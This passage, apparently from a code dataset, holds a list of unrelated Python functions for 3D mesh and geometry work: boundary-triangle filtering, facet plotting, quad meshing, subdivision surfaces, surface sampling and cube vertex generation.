Also, remove from the list any tris that share two points with one of these tris.\n # --> this is because this means an edge (not a boundary edge) connects two boundary particles,\n # and cuts off another particle.\n btri_repeats = btris[btris[1:] == btris[:-1]]\n # print 'TRI = ', TRI\n # print 'btris = ', btris\n # print 'btri_repeats = ', btri_repeats\n\n # btri = np.setdiff1d(btris,btri_repeats)\n btris = np.unique(btris)\n\n # If any btri triangles share an edge with a btri_repeats (they share 2 points),\n # kill the btri triangle.\n mask = np.ones(len(btris), dtype=bool)\n for ii in range(len(btris)):\n # if this one isn't itself a repeat, check against all brtri_repeats\n if not np.in1d(btris[ii], btri_repeats):\n tri0 = TRI[btris[ii]]\n for btr in btri_repeats:\n tri1 = TRI[btr]\n if len(np.intersect1d(tri0, tri1, assume_unique=True)) > 1:\n # print 'matching = ', np.intersect1d(tri0,tri1,assume_unique=True)\n mask[ii] = False\n btri = btris[mask]\n\n return btri", "def dim3():\n return Integer(\"yolo3\", \"uniform\", 3, 7, shape=(1,))", "def display_facet(model_name, vertices, faces, plot_type, display_normals=False, scale=0.2):\n # Separate the coordinates of the vertices\n x = vertices[:, 0]\n y = vertices[:, 1]\n z = vertices[:, 2]\n\n # Display the model\n ax = Axes3D(plt.figure())\n if plot_type == 'Facet':\n ax.plot_trisurf(x, y, z, triangles=faces, color=(1, 1, 1, 1), edgecolor='gray')\n elif plot_type == 'Wireframe':\n ax.plot_trisurf(x, y, z, triangles=faces, color='none', edgecolor='black')\n ax.grid(True)\n set_equal(ax)\n\n ax.set_title(model_name, size='14')\n ax.set_xlabel('X', size='12')\n ax.set_ylabel('Y', size='12')\n ax.set_zlabel('Z', size='12')\n\n # Set the tick label size\n ax.tick_params(labelsize=12)\n\n if display_normals:\n\n # Vector from origin to vertices\n r = zeros([vertices.shape[0], 3])\n\n for i in range(vertices.shape[0]):\n r[i] = [vertices[i][0], vertices[i][1], vertices[i][2]]\n\n for i in range(faces.shape[0]):\n a = r[faces[i][1]] - r[faces[i][0]]\n b = r[faces[i][2]] - r[faces[i][1]]\n\n # Outward normal\n normal = cross(a, b) + 0.\n\n # Scale the size of the arrow to be displayed\n normal *= scale\n\n # Put the arrow at the center of the facet\n mean_r = (r[faces[i][0]] + r[faces[i][1]] + r[faces[i][2]]) / 3.0\n\n # Get the arrow for the normal\n arrow = Arrow3D([mean_r[0], mean_r[0] + normal[0]], [mean_r[1], mean_r[1] + normal[1]],\n [mean_r[2], mean_r[2] + normal[2]], mutation_scale=10, lw=1, arrowstyle=\"-|>\", color=\"r\")\n ax.add_artist(arrow)\n\n plt.show()", "def importWells3D(BD_prlvm,grid,lst_domain,fac=1/365/86400,V_col=\"V Bancaris\",geol_col=\"NAPPE_CAPT\",\n geol_layer=[\"PLIOCENE\",\"QUATERNAIRE\"],layer_num=[1,0]):\n \n ix=GridIntersect(grid)\n stress_data_well=[]\n \n for ilayer in range(len(geol_layer)): # iterate through layers\n BD = BD_prlvm[BD_prlvm[geol_col] == geol_layer[ilayer]] # only keep layers with the right geol\n for o in BD.index: #iterate through each well\n Vw = BD.loc[o,V_col]\n if not (np.isnan(Vw)) | (Vw == 0): #keep productive well\n cellidx = ix.intersect(BD.geometry[o]).cellids[0][0]\n cellidy = ix.intersect(BD.geometry[o]).cellids[0][1]\n \n if type(layer_num[ilayer]) == int :\n cellid = (layer_num[ilayer],cellidx,cellidy) #cell on which the well is active\n if cellid in lst_domain: # check if the well is in the domain\n stress_data_well.append((cellid,-fac*Vw))\n elif len(layer_num[ilayer]) > 1:\n cpt=0\n for isublay in layer_num[ilayer]:\n cellid = (isublay,cellidx,cellidy)\n\n if cellid in 
lst_domain:\n cpt+=1\n for isublay in layer_num[ilayer]: \n cellid = (isublay,cellidx,cellidy)\n if cellid in lst_domain: # check if the well is in the domain\n stress_data_well.append((cellid,-fac*Vw/cpt))\n \n return stress_data_well", "def get_quad_mesh(q, dx):\n P0, P1, P2, P3 = q\n p0 = Vector.fromPoint(P0) # fromPoint converts to ECEF\n p1 = Vector.fromPoint(P1)\n p2 = Vector.fromPoint(P2)\n p3 = Vector.fromPoint(P3)\n\n # Get nx based on length of top edge, minimum allowed is 2\n toplen_km = get_quad_length(q)\n nx = int(np.max([round(toplen_km / dx, 0) + 1, 2]))\n\n # Get array of points along top and bottom edges\n xfac = np.linspace(0, 1, nx)\n topp = [p0 + (p1 - p0) * a for a in xfac]\n botp = [p3 + (p2 - p3) * a for a in xfac]\n\n # Get ny based on mean length of vectors connecting top and bottom points\n ylen_km = np.ones(nx)\n for i in range(nx):\n ylen_km[i] = (topp[i] - botp[i]).mag() / 1000\n ny = int(np.max([round(np.mean(ylen_km) / dx, 0) + 1, 2]))\n yfac = np.linspace(0, 1, ny)\n\n # Build mesh: dict of ny by nx arrays (x, y, z):\n mesh = {'x': np.zeros([ny, nx]), 'y': np.zeros(\n [ny, nx]), 'z': np.zeros([ny, nx])}\n for i in range(nx):\n mpts = [topp[i] + (botp[i] - topp[i]) * a for a in yfac]\n mesh['x'][:, i] = [a.x for a in mpts]\n mesh['y'][:, i] = [a.y for a in mpts]\n mesh['z'][:, i] = [a.z for a in mpts]\n\n # Make arrays of pixel corners\n mesh['llx'] = mesh['x'][1:, 0:-1]\n mesh['lrx'] = mesh['x'][1:, 1:]\n mesh['ulx'] = mesh['x'][0:-1, 0:-1]\n mesh['urx'] = mesh['x'][0:-1, 1:]\n mesh['lly'] = mesh['y'][1:, 0:-1]\n mesh['lry'] = mesh['y'][1:, 1:]\n mesh['uly'] = mesh['y'][0:-1, 0:-1]\n mesh['ury'] = mesh['y'][0:-1, 1:]\n mesh['llz'] = mesh['z'][1:, 0:-1]\n mesh['lrz'] = mesh['z'][1:, 1:]\n mesh['ulz'] = mesh['z'][0:-1, 0:-1]\n mesh['urz'] = mesh['z'][0:-1, 1:]\n mesh['cpx'] = np.zeros_like(mesh['llx'])\n mesh['cpy'] = np.zeros_like(mesh['llx'])\n mesh['cpz'] = np.zeros_like(mesh['llx'])\n\n # i and j are indices over subruptures\n ni, nj = mesh['llx'].shape\n for i in range(0, ni):\n for j in range(0, nj):\n # Rupture corner points\n pp0 = Vector(\n mesh['ulx'][i, j], mesh['uly'][i, j], mesh['ulz'][i, j])\n pp1 = Vector(\n mesh['urx'][i, j], mesh['ury'][i, j], mesh['urz'][i, j])\n pp2 = Vector(\n mesh['lrx'][i, j], mesh['lry'][i, j], mesh['lrz'][i, j])\n pp3 = Vector(\n mesh['llx'][i, j], mesh['lly'][i, j], mesh['llz'][i, j])\n # Find center of quad\n mp0 = pp0 + (pp1 - pp0) * 0.5\n mp1 = pp3 + (pp2 - pp3) * 0.5\n cp = mp0 + (mp1 - mp0) * 0.5\n mesh['cpx'][i, j] = cp.x\n mesh['cpy'][i, j] = cp.y\n mesh['cpz'][i, j] = cp.z\n return mesh", "def CreateSurface2DMeshfrom3DMesh(self):\n\n self.__do_memebers_exist__()\n\n p = self.InferPolynomialDegree()\n mm = Mesh()\n if self.element_type == \"hex\":\n mm.element_type = \"quad\"\n elif self.element_type == \"tet\":\n mm.element_type = \"tri\"\n else:\n raise ValueError(\"Cannot make a 2D mesh from the 3D mesh of type {}\".format(self.element_type))\n\n unique_faces, inv_faces = np.unique(self.faces,return_inverse=True)\n mm.points = self.points[unique_faces,:]\n mm.nnode = mm.points.shape[0]\n aranger = np.arange(mm.nnode)\n mm.elements = aranger[inv_faces].reshape(self.faces.shape)\n mm.nelem = mm.elements.shape[0]\n mm.GetBoundaryEdges()\n\n return mm", "def volume_polyhedron(polyhedron):\n V = 0\n for fkey in polyhedron.face:\n vertices = polyhedron.face_vertices(fkey, ordered=True)\n if len(vertices) == 3:\n faces = [vertices]\n else:\n faces = []\n for i in range(1, len(vertices) - 1):\n 
faces.append(vertices[0:1] + vertices[i:i + 2])\n for face in faces:\n a = polyhedron.vertex_coordinates(face[0])\n b = polyhedron.vertex_coordinates(face[1])\n c = polyhedron.vertex_coordinates(face[2])\n ab = subtract_vectors(b, a)\n ac = subtract_vectors(c, a)\n n = cross_vectors(ab, ac)\n V += dot_vectors(a, n)\n return V / 6.", "def plot3d(data_x, data_y, data_z, vol):\n fig = go.Figure(\n data = [\n go.Mesh3d(\n x = data_x,\n y = data_y,\n z = data_z,\n i = [7, 0, 0, 0, 4, 4, 6, 6, 4, 0, 3, 2], # These are needed, numbers from documentation\n j = [3, 4, 1, 2, 5, 6, 5, 2, 0, 1, 6, 3],\n k = [0, 7, 2, 3, 6, 7, 1, 1, 5, 5, 7, 6],\n colorscale=[[0, 'darkblue'],\n [0.5, 'lightskyblue'],\n [1, 'darkblue']],\n intensity = np.linspace(0, 1, 8, endpoint=True),\n showscale=False,\n opacity = 0.6\n )\n ],\n layout = go.Layout(\n title = \"Le volume est: \" + str(vol),\n autosize = True\n )\n )\n\n # This prints it\n pyo.iplot(fig, filename='Determinant-Volume')", "def get3d(infile, histname, subdir='',verbose=False): \n\n ## 2d Histogram\n Hist = getter(infile,histname,subdir,verbose)\n\n nbinsX, nbinsY, nbinsZ = Hist.GetNbinsX(), Hist.GetNbinsY(), Hist.GetNbinsZ()\n Arr = np.zeros((nbinsZ,nbinsY,nbinsX))\n dArr = np.zeros((nbinsZ,nbinsY,nbinsX))\n axesX = np.zeros(nbinsX)\n axesY = np.zeros(nbinsY)\n axesZ = np.zeros(nbinsZ)\n edgesX = np.zeros(nbinsX+1)\n edgesY = np.zeros(nbinsY+1)\n edgesZ = np.zeros(nbinsZ+1)\n for j in xrange(0,nbinsX):\n axesX[j] = Hist.GetXaxis().GetBinCenter(j+1)\n edgesX[j] = Hist.GetXaxis().GetBinLowEdge(j+1)\n edgesX[nbinsX] = Hist.GetXaxis().GetBinLowEdge(nbinsX+1)\n\n for j in xrange(0,nbinsY):\n axesY[j] = Hist.GetYaxis().GetBinCenter(j+1)\n edgesY[j] = Hist.GetYaxis().GetBinLowEdge(j+1)\n edgesY[nbinsY] = Hist.GetYaxis().GetBinLowEdge(nbinsY+1)\n\n for j in xrange(0,nbinsZ):\n axesZ[j] = Hist.GetZaxis().GetBinCenter(j+1)\n edgesZ[j] = Hist.GetZaxis().GetBinLowEdge(j+1)\n edgesZ[nbinsZ] = Hist.GetZaxis().GetBinLowEdge(nbinsZ+1)\n\n axes = [axesX, axesY, axesZ]\n edges = [edgesX, edgesY, edgesZ]\n \n for j in xrange(0,nbinsX):\n for k in xrange(0,nbinsY):\n for l in xrange(0,nbinsZ):\n Arr[l,k,j] = Hist.GetBinContent(j+1,k+1,l+1)\n dArr[l,k,j] = Hist.GetBinError(j+1,k+1,l+1)\n \n return axes, edges, Arr, dArr", "def subdivision(mesh):\n\t\n\t\n\t# 1. generate new nodes in the centre of quad\n\t# 1/4 o-------o 1/4 o: existing vertices\n\t# | | *: newly-generated vertices\n\t# | * |\n\t# | |\n\t# 1/4 o-------o 1/4\n\n\tnew_coor = mesh.give_nodes().give_coor()\n\t\n\tfor face_index in range(mesh.give_model_inf()[2]): \n\t\tnew_x, new_y, new_z = (0, 0, 0)\n\t\tfor vertex_index in range(4):\n\t\t\tmesh.give_faces()\n\t\t\tnode_index = mesh.give_faces().give_node_list(face_index)[vertex_index]\n\n\t\t\tnew_x += 0.25*mesh.give_nodes().give_coor(node_index)[0]\n\t\t\tnew_y += 0.25*mesh.give_nodes().give_coor(node_index)[1]\n\t\t\tnew_z += 0.25*mesh.give_nodes().give_coor(node_index)[2]\n\t\t\t\n\t\tnew_coor.append((new_x, new_y, new_z))\n\t\t\n\t# generating new nodes on the edge\n\t# figure out one edge is shared by how many surfaces\n\tedge_shared_by_faces_list = helper.find_edge_shared_by_which_faces(mesh.give_edges(), mesh.give_faces())\n\t\n\tfor edge_index in range(mesh.give_model_inf()[1]):\n\n\t\tnew_x, new_y, new_z = (0., 0., 0.)\n\t\t\n\t# 2. 
generate new node on boundary edge\n\t# o: existing vertices\n\t# 1/2 o---*---o 1/2 *: newly-generated vertices\n\t# \n\n\t\tnew_coor = mesh.give_nodes().give_coor()\n\t\tif len(edge_shared_by_faces_list[edge_index]) == 1:\t\n\t\t\tnew_x, new_y, new_z = (0., 0., 0.)\n\t\t\tfor vertex_index in range(2):\n\t\t\t\tthis_node = mesh.give_edges().give_node(edge_index)[vertex_index]\n\t\t\t\tnew_x += 0.5*mesh.give_nodes().give_coor()[this_node][0]\n\t\t\t\tnew_y += 0.5*mesh.give_nodes().give_coor()[this_node][1]\n\t\t\t\tnew_z += 0.5*mesh.give_nodes().give_coor()[this_node][2]\n\t\t\t\t\n\t\t\tnew_coor.append((new_x, new_y, new_z))\n\t\t\t\t\n\t# 3. generate new node on interior edge\n\t# 1/16 o-------o 1/16 o: existing vertices\n\t# | | *: newly-generated vertices\n\t# 3/8 o---*---o 3/8\n\t# | |\n\t# 1/16 o-------o 1/16\n\n\t\telse:\n\t\t\tnew_x, new_y, new_z = (0., 0., 0.)\n\t\t\tconsidered_node = []\n\t\t\tfor vertex_index in range(2):\n\t\t\t\tthis_node = mesh.give_edges().give_node(edge_index)[vertex_index]\n\t\t\t\tconsidered_node.append(this_node)\n\t\t\t\tnew_x += 3./8.*mesh.give_nodes().give_coor()[this_node][0]\n\t\t\t\tnew_y += 3./8.*mesh.give_nodes().give_coor()[this_node][1]\n\t\t\t\tnew_z += 3./8.*mesh.give_nodes().give_coor()[this_node][2]\n\t\t\t\n\t\t\t# faces contain this node\n\t\t\tpotential_node = []\n\t\t\tfor face_index in edge_shared_by_faces_list[edge_index]:\t\t\n\t\t\t\tfor vertex_index in range(4):\n\t\t\t\t\t\tpotential_node.append(mesh.give_faces().give_node_list(face_index)[vertex_index])\n\t\t\t\n\t\t\touter_node = []\n\t\t\tfor node in potential_node:\n\t\t\t\tif (node not in considered_node) & (node not in outer_node):\n\t\t\t\t\touter_node.append(node)\n\t\t\t\t\t\n\t\t\tfor vertex_index in outer_node:\n\t\t\t\tnew_x += 1./16.*mesh.give_nodes().give_coor()[vertex_index][0]\n\t\t\t\tnew_y += 1./16.*mesh.give_nodes().give_coor()[vertex_index][1]\n\t\t\t\tnew_z += 1./16.*mesh.give_nodes().give_coor()[vertex_index][2]\n\t\t\t\n\t\t\tnew_coor.append((new_x, new_y, new_z))\n\n\t# update the links of edges and surfaces\n\tnew_edge_list = []\n\tnew_face_list = []\n\tfor face_index in range(mesh.give_model_inf()[2]):\n\t\told_node0 = mesh.give_faces().give_node_list(face_index)[0]\n\t\told_node1 = mesh.give_faces().give_node_list(face_index)[1]\n\t\told_node2 = mesh.give_faces().give_node_list(face_index)[2]\n\t\told_node3 = mesh.give_faces().give_node_list(face_index)[3]\n\t\t\n\t\told_edge0 = mesh.give_faces().give_edge_list(face_index)[0]\n\t\told_edge1 = mesh.give_faces().give_edge_list(face_index)[1]\n\t\told_edge2 = mesh.give_faces().give_edge_list(face_index)[2]\n\t\told_edge3 = mesh.give_faces().give_edge_list(face_index)[3]\n\t\t\n\t\tnew_node4 = old_edge0 + mesh.give_model_inf()[0] + mesh.give_model_inf()[2] \n\t\tnew_node5 = old_edge1 + mesh.give_model_inf()[0] + mesh.give_model_inf()[2]\n\t\tnew_node6 = old_edge2 + mesh.give_model_inf()[0] + mesh.give_model_inf()[2]\n\t\tnew_node7 = old_edge3 + mesh.give_model_inf()[0] + mesh.give_model_inf()[2]\t\n\t\tnew_node8 = mesh.give_model_inf()[0] + face_index\n\t\t\n\t\tif helper.in_list((old_node0, new_node4), new_edge_list) == False: \n\t\t\tnew_edge_list.append((old_node0, new_node4))\n\t\tif helper.in_list((new_node4, new_node8), new_edge_list) == False: \n\t\t\tnew_edge_list.append((new_node4, new_node8))\n\t\tif helper.in_list((new_node8, new_node7), new_edge_list) == False: \n\t\t\tnew_edge_list.append((new_node8, new_node7))\n\t\tif helper.in_list((new_node7, old_node0), new_edge_list) == False: 
\n\t\t\tnew_edge_list.append((new_node7, old_node0))\n\t\tif helper.in_list((new_node4, old_node1), new_edge_list) == False: \n\t\t\tnew_edge_list.append((new_node4, old_node1))\n\t\tif helper.in_list((old_node1, new_node5), new_edge_list) == False: \n\t\t\tnew_edge_list.append((old_node1, new_node5))\n\t\tif helper.in_list((new_node5, new_node8), new_edge_list) == False: \n\t\t\tnew_edge_list.append((new_node5, new_node8))\n\t\tif helper.in_list((new_node7, old_node3), new_edge_list) == False: \n\t\t\tnew_edge_list.append((new_node7, old_node3))\n\t\tif helper.in_list((old_node3, new_node6), new_edge_list) == False: \n\t\t\tnew_edge_list.append((old_node3, new_node6))\n\t\tif helper.in_list((new_node6, new_node8), new_edge_list) == False: \n\t\t\tnew_edge_list.append((new_node6, new_node8))\n\t\tif helper.in_list((new_node6, old_node2), new_edge_list) == False: \n\t\t\tnew_edge_list.append((new_node6, old_node2))\n\t\tif helper.in_list((old_node2, new_node5), new_edge_list) == False: \n\t\t\tnew_edge_list.append((old_node2, new_node5))\n\t\n\t\tnew_face_list.append((old_node0, new_node4, new_node8, new_node7))\n\t\tnew_face_list.append((new_node4, old_node1, new_node5, new_node8))\n\t\tnew_face_list.append((new_node7, new_node8, new_node6, old_node3))\n\t\tnew_face_list.append((new_node8, new_node5, old_node2, new_node6))\n\t\t\n\tnew_edges = geo.Edge(new_edge_list)\n\t\n\tnew_faces = geo.Face(new_face_list, new_edges)\n\t\t\n\t# update existing nodes\t\n\tfor node_index in range(mesh.give_model_inf()[0]):\n\t\t\n\t\tring1, ring2 = helper.find_neighbour_node(new_edges, new_faces, node_index)\n\t\tvalence = helper.find_valence(node_index, new_faces) \n\t\t#: valence: the number of faces sharing on specific edge\n\n\t# 4. update existing corner vertex\n\t# 2/4 @---* 1/4 *: newly-generated vertices\n\t# | | @: existing vertices to be updated\n\t# 1/4 *---* 0 The higher mask values on neighbouring vertices, \n\t# the more likely a square mesh will be refined into a sphere.\n\t \n\t\tif valence == 1:\n\n\t\t\tnew_x, new_y, new_z = (0, 0, 0)\n\t\t\tprint\n\t\t\tfor node_in_ring1 in ring1:\n\t\t\t\tnew_x += 1./4.*mesh.give_nodes().give_coor()[node_in_ring1][0]\n\t\t\t\tnew_y += 1./4.*mesh.give_nodes().give_coor()[node_in_ring1][1]\n\t\t\t\tnew_z += 1./4.*mesh.give_nodes().give_coor()[node_in_ring1][2]\n\n\t\t\tfor node_in_ring2 in ring2:\n\t\t\t\tnew_x += 0.*mesh.give_nodes().give_coor()[node_in_ring2][0]\n\t\t\t\tnew_y += 0.*mesh.give_nodes().give_coor()[node_in_ring2][1]\n\t\t\t\tnew_z += 0.*mesh.give_nodes().give_coor()[node_in_ring2][2]\n\t\t\t\t\n\t\t\tnew_x += 2./4.*mesh.give_nodes().give_coor()[node_index][0]\n\t\t\tnew_y += 2./4.*mesh.give_nodes().give_coor()[node_index][1]\n\t\t\tnew_z += 2./4.*mesh.give_nodes().give_coor()[node_index][2]\n\n\t# 5. 
update existing boundary joint vertex\n\t# 3/4\n\t# 1/8 *---*---* 1/8 *: newly-generated vertices\n\t# | | | @: existing vertices to be updated\n\t# 0 *---*---* 0\n\n\t\telif valence == 2:\n\t\t\t\n\t\t\tnew_x, new_y, new_z = (0, 0, 0)\n\t\t\tfor node_in_ring1 in ring1:\n\t\t\t\tif helper.find_valence(node_in_ring1, new_faces) <= 2: \n\t\t\t\t\tnew_x += 1./8.*mesh.give_nodes().give_coor()[node_in_ring1][0]\n\t\t\t\t\tnew_y += 1./8.*mesh.give_nodes().give_coor()[node_in_ring1][1]\n\t\t\t\t\tnew_z += 1./8.*mesh.give_nodes().give_coor()[node_in_ring1][2]\n\t\t\t\t\t\n\t\t\tnew_x += 3./4.*mesh.give_nodes().give_coor()[node_index][0]\n\t\t\tnew_y += 3./4.*mesh.give_nodes().give_coor()[node_index][1]\n\t\t\tnew_z += 3./4.*mesh.give_nodes().give_coor()[node_index][2]\n\t\n\t# 6. update new node on interior edge\n\t# * r/k\n\t# /\\ b/k*\n\t# *__/ \\___ r/k\n\t# \\ \\ /¬¬/ *: newly-generated vertices: \n\t# \\ \\/ / b = 3/2/valence, r = 1/4/valence\n\t# *--@--* b/k\t @: existing vertices to be updated: 1-b-r\t\t\n\t# / /\\ \\\n\t# /__/ \\__\\\n\t# * \\ / * r/k\n\t# \\/\n\t\t\n\t\telse:\n\t\t\tnew_x, new_y, new_z = (0, 0, 0)\n\t\t\tbeta = 3./2./valence\n\t\t\tgamma = 1./4./valence\n\t\t\tfor node_in_ring1 in ring1:\n\t\t\t\tnew_x += beta/valence*mesh.give_nodes().give_coor()[node_in_ring1][0]\n\t\t\t\tnew_y += beta/valence*mesh.give_nodes().give_coor()[node_in_ring1][1]\n\t\t\t\tnew_z += beta/valence*mesh.give_nodes().give_coor()[node_in_ring1][2]\n\t\t\t\n\t\t\tfor node_in_ring2 in ring2:\n\t\t\t\tnew_x += gamma/valence*mesh.give_nodes().give_coor()[node_in_ring2][0]\n\t\t\t\tnew_y += gamma/valence*mesh.give_nodes().give_coor()[node_in_ring2][1]\n\t\t\t\tnew_z += gamma/valence*mesh.give_nodes().give_coor()[node_in_ring2][2]\n\t\t\t\n\t\t\tnew_x += (1. - beta - gamma)*mesh.give_nodes().give_coor()[node_index][0]\n\t\t\tnew_y += (1. - beta - gamma)*mesh.give_nodes().give_coor()[node_index][1]\n\t\t\tnew_z += (1. 
- beta - gamma)*mesh.give_nodes().give_coor()[node_index][2]\n\t\t\n\t\tnew_coor[node_index] = (new_x, new_y, new_z)\n\t\n\tnew_nodes = geo.Node(new_coor)\n\t\n\tmesh.update(new_nodes, new_edges, new_faces)\n\t\n\t# return new_mesh\n\treturn mesh", "def get_surfaces_per_volume(my_core, entityset_ranges):\n\n s_p_v = {}\n for volumeset in entityset_ranges['Volumes']:\n s_p_v[volumeset] = my_core.get_child_meshsets(volumeset).size()\n return s_p_v", "def sample_surface(mesh, count):\n\n # len(mesh.faces) float, array of the areas\n # of each face of the mesh\n area = mesh.area_faces\n # total area (float)\n area_sum = np.sum(area)\n # cumulative area (len(mesh.faces))\n area_cum = np.cumsum(area)\n face_pick = np.random.random(count) * area_sum\n face_index = np.searchsorted(area_cum, face_pick)\n\n # pull triangles into the form of an origin + 2 vectors\n tri_origins = mesh.triangles[:, 0]\n tri_vectors = mesh.triangles[:, 1:].copy()\n tri_vectors -= np.tile(tri_origins, (1, 2)).reshape((-1, 2, 3))\n\n # pull the vectors for the faces we are going to sample from\n tri_origins = tri_origins[face_index]\n tri_vectors = tri_vectors[face_index]\n\n # randomly generate two 0-1 scalar components to multiply edge vectors by\n random_lengths = np.random.random((len(tri_vectors), 2, 1))\n\n # points will be distributed on a quadrilateral if we use 2 0-1 samples\n # if the two scalar components sum less than 1.0 the point will be\n # inside the triangle, so we find vectors longer than 1.0 and\n # transform them to be inside the triangle\n random_test = random_lengths.sum(axis=1).reshape(-1) > 1.0\n random_lengths[random_test] -= 1.0\n random_lengths = np.abs(random_lengths)\n\n # multiply triangle edge vectors by the random lengths and sum\n sample_vector = (tri_vectors * random_lengths).sum(axis=1)\n\n # finally, offset by the origin to generate\n # (n,3) points in space on the triangle\n samples = sample_vector + tri_origins\n\n return samples, face_index", "def surfaces(self):\n return self._surfaces", "def facets(self) -> list[Polytope]:\n first_polygon_index = self.rank - max(self.pdim - 1, 1) - 1\n slices = (slice(None),) * first_polygon_index\n return [self._cast_polytope(self[slices + (i,)], self.pdim - 1) for i in range(self.shape[first_polygon_index])]", "def _get_surfaces(idf):\n surface_types = [\n 'BUILDINGSURFACE:DETAILED',\n 'FENESTRATIONSURFACE:DETAILED',\n ]\n surfaces = []\n for surface_type in surface_types:\n surfaces.extend(idf.idfobjects[surface_type])\n\n return surfaces", "def _vertices(self, point):\n vertex_0, vertex_1, vertex_2 = tuple(\n gs.take(point, indices=self.faces[:, i], axis=-2) for i in range(3)\n )\n if point.ndim == 3 and vertex_0.ndim == 2:\n vertex_0 = gs.expand_dims(vertex_0, axis=0)\n vertex_1 = gs.expand_dims(vertex_1, axis=0)\n vertex_2 = gs.expand_dims(vertex_2, axis=0)\n return vertex_0, vertex_1, vertex_2", "def get_vertex_data(\n mesh: object,\n g: BinaryReader,\n v1: int,\n v2: int,\n v3: int,\n v4: int,\n n: int,\n verbose=False,\n):\n for i in range(v1):\n v_offset = g.tell()\n mesh.vertPosList.append(g.f(3))\n mesh.vertNormList.append(g.f(3))\n indice_offset = g.tell()\n if verbose:\n logger.debug({\n \"v1 v_offset\": v_offset,\n \"v1 indice_offset\": indice_offset,\n })\n mesh.skinIndiceList.append(g.B(4))\n mesh.skinWeightList.append([0, 0, 0, 1])\n\n for i in range(v2):\n v_offset = g.tell()\n mesh.vertPosList.append(g.f(3))\n mesh.vertNormList.append(g.f(3))\n indice_offset = g.tell()\n if verbose:\n logger.debug({\n \"v2 v_offset\": 
v_offset,\n \"v2 indice_offset\": indice_offset,\n })\n mesh.skinIndiceList.append(g.B(4))\n w1 = g.f(1)[0]\n w2 = 1.0 - w1\n mesh.skinWeightList.append([0, 0, w2, w1])\n\n for i in range(v3):\n v_offset = g.tell()\n mesh.vertPosList.append(g.f(3))\n mesh.vertNormList.append(g.f(3))\n indice_offset = g.tell()\n if verbose:\n logger.debug({\n \"v3 v_offset\": v_offset,\n \"v3 indice_offset\": indice_offset,\n })\n mesh.skinIndiceList.append(g.B(4))\n w1 = g.f(1)[0]\n w2 = g.f(1)[0]\n w3 = 1.0 - w1 - w2\n mesh.skinWeightList.append([0, w3, w2, w1])\n\n for i in range(v4):\n v_offset = g.tell()\n mesh.vertPosList.append(g.f(3))\n mesh.vertNormList.append(g.f(3))\n indice_offset = g.tell()\n if verbose:\n logger.debug({\n \"v4 v_offset\": v_offset,\n \"v4 indice_offset\": indice_offset,\n })\n mesh.skinIndiceList.append(g.B(4))\n w1 = g.f(1)[0]\n w2 = g.f(1)[0]\n w3 = g.f(1)[0]\n w4 = 1.0 - w1 - w2 - w3\n mesh.skinWeightList.append([w4, w3, w2, w1])", "def _triangular_mesh_to_three_geometry(vertices, faces, vertex_colors=None):\n context = _js_builder.Js(mode=_js_builder.PERSISTENT)\n vertices = context.Float32Array.new_object(vertices.ravel().tolist())\n faces = context.Uint32Array.new_object(faces.ravel().tolist())\n geometry = context.THREE.BufferGeometry.new_object()\n geometry.addAttribute('position',\n context.THREE.BufferAttribute.new_object(vertices, 3))\n geometry.setIndex(context.THREE.BufferAttribute.new_object(faces, 1))\n geometry.computeVertexNormals()\n if vertex_colors is not None:\n vertex_colors = context.Float32Array.new_object(\n vertex_colors.ravel().tolist())\n geometry.addAttribute(\n 'color', context.THREE.BufferAttribute.new_object(vertex_colors, 3))\n\n return geometry", "def create_cube(scale=(1.0,1.0,1.0), st=False, rgba=False, dtype='float32', type='triangles'):\n\n shape = [24, 3]\n rgba_offset = 3\n\n width, height, depth = scale\n # half the dimensions\n width /= 2.0\n height /= 2.0\n depth /= 2.0\n\n vertices = np.array([\n # front\n # top right\n ( width, height, depth,),\n # top left\n (-width, height, depth,),\n # bottom left\n (-width,-height, depth,),\n # bottom right\n ( width,-height, depth,),\n\n # right\n # top right\n ( width, height,-depth),\n # top left\n ( width, height, depth),\n # bottom left\n ( width,-height, depth),\n # bottom right\n ( width,-height,-depth),\n\n # back\n # top right\n (-width, height,-depth),\n # top left\n ( width, height,-depth),\n # bottom left\n ( width,-height,-depth),\n # bottom right\n (-width,-height,-depth),\n\n # left\n # top right\n (-width, height, depth),\n # top left\n (-width, height,-depth),\n # bottom left\n (-width,-height,-depth),\n # bottom right\n (-width,-height, depth),\n\n # top\n # top right\n ( width, height,-depth),\n # top left\n (-width, height,-depth),\n # bottom left\n (-width, height, depth),\n # bottom right\n ( width, height, depth),\n\n # bottom\n # top right\n ( width,-height, depth),\n # top left\n (-width,-height, depth),\n # bottom left\n (-width,-height,-depth),\n # bottom right\n ( width,-height,-depth),\n ], dtype=dtype)\n\n st_values = None\n rgba_values = None\n\n if st:\n # default st values\n st_values = np.tile(\n np.array([\n (1.0, 1.0,),\n (0.0, 1.0,),\n (0.0, 0.0,),\n (1.0, 0.0,),\n ], dtype=dtype),\n (6,1,)\n )\n\n if isinstance(st, bool):\n pass\n elif isinstance(st, (int, float)):\n st_values *= st\n elif isinstance(st, (list, tuple, np.ndarray)):\n st = np.array(st, dtype=dtype)\n if st.shape == (2,2,):\n # min / max\n st_values *= st[1] - st[0]\n st_values += st[0]\n elif 
st.shape == (4,2,):\n # per face st values specified manually\n st_values[:] = np.tile(st, (6,1,))\n elif st.shape == (6,2,):\n # st values specified manually\n st_values[:] = st\n else:\n raise ValueError('Invalid shape for st')\n else:\n raise ValueError('Invalid value for st')\n\n shape[-1] += st_values.shape[-1]\n rgba_offset += st_values.shape[-1]\n\n if rgba:\n # default rgba values\n rgba_values = np.tile(np.array([1.0, 1.0, 1.0, 1.0], dtype=dtype), (24,1,))\n\n if isinstance(rgba, bool):\n pass\n elif isinstance(rgba, (int, float)):\n # int / float expands to RGBA with all values == value\n rgba_values *= rgba \n elif isinstance(rgba, (list, tuple, np.ndarray)):\n rgba = np.array(rgba, dtype=dtype)\n\n if rgba.shape == (3,):\n rgba_values = np.tile(rgba, (24,1,))\n elif rgba.shape == (4,):\n rgba_values[:] = np.tile(rgba, (24,1,))\n elif rgba.shape == (4,3,):\n rgba_values = np.tile(rgba, (6,1,))\n elif rgba.shape == (4,4,):\n rgba_values = np.tile(rgba, (6,1,))\n elif rgba.shape == (6,3,):\n rgba_values = np.repeat(rgba, 4, axis=0)\n elif rgba.shape == (6,4,):\n rgba_values = np.repeat(rgba, 4, axis=0)\n elif rgba.shape == (24,3,):\n rgba_values = rgba\n elif rgba.shape == (24,4,):\n rgba_values = rgba\n else:\n raise ValueError('Invalid shape for rgba')\n else:\n raise ValueError('Invalid value for rgba')\n\n shape[-1] += rgba_values.shape[-1]\n\n data = np.empty(shape, 